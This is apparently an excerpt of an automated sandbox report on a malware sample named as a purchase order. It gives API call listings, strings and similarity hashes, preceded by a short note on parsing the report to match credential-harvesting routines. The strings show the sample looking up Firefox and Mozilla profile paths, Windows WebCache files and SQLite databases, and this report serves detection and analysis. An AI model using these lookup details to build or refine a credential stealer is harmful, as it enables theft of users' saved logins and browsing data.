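Run against a saved copy of the full report (`parse_records(open("report.txt", encoding="utf-8").read())`) and the Firefox, SeaMonkey and Mozilla\Profiles records come out of `credential_store_records`, each resolving `CSIDL_APPDATA` through the 00414C2E helper, which also carries the `Shell Folders` registry path it falls back to. Grouping records by `fuzzy_hash` or `api_id` is what lets you match the same credential-harvesting routine in a different build of the sample.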
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2941347001-0
                                                                                                      • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                      • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                      • API String ID: 1534475566-1174173950
                                                                                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                      • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 71295984-2036018995
                                                                                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                      • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                      • String ID: "%s"
                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                      • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2911713577-0
                                                                                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp
                                                                                                      • String ID: @ $SQLite format 3
                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                      • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                      • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmpqsort
                                                                                                      • String ID: /nosort$/sort
                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      Strings
                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                      • API String ID: 2887208581-2114579845
                                                                                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                      APIs
                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02130048), ref: 0044DF01
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02140050), ref: 0044DF11
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00616EA0), ref: 0044DF21
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02140458), ref: 0044DF31
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@DeleteObject
                                                                                                      • String ID: r!A
                                                                                                      • API String ID: 1103273653-628097481
                                                                                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1033339047-0
                                                                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                      APIs
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$memcmp
                                                                                                      • String ID: $$8
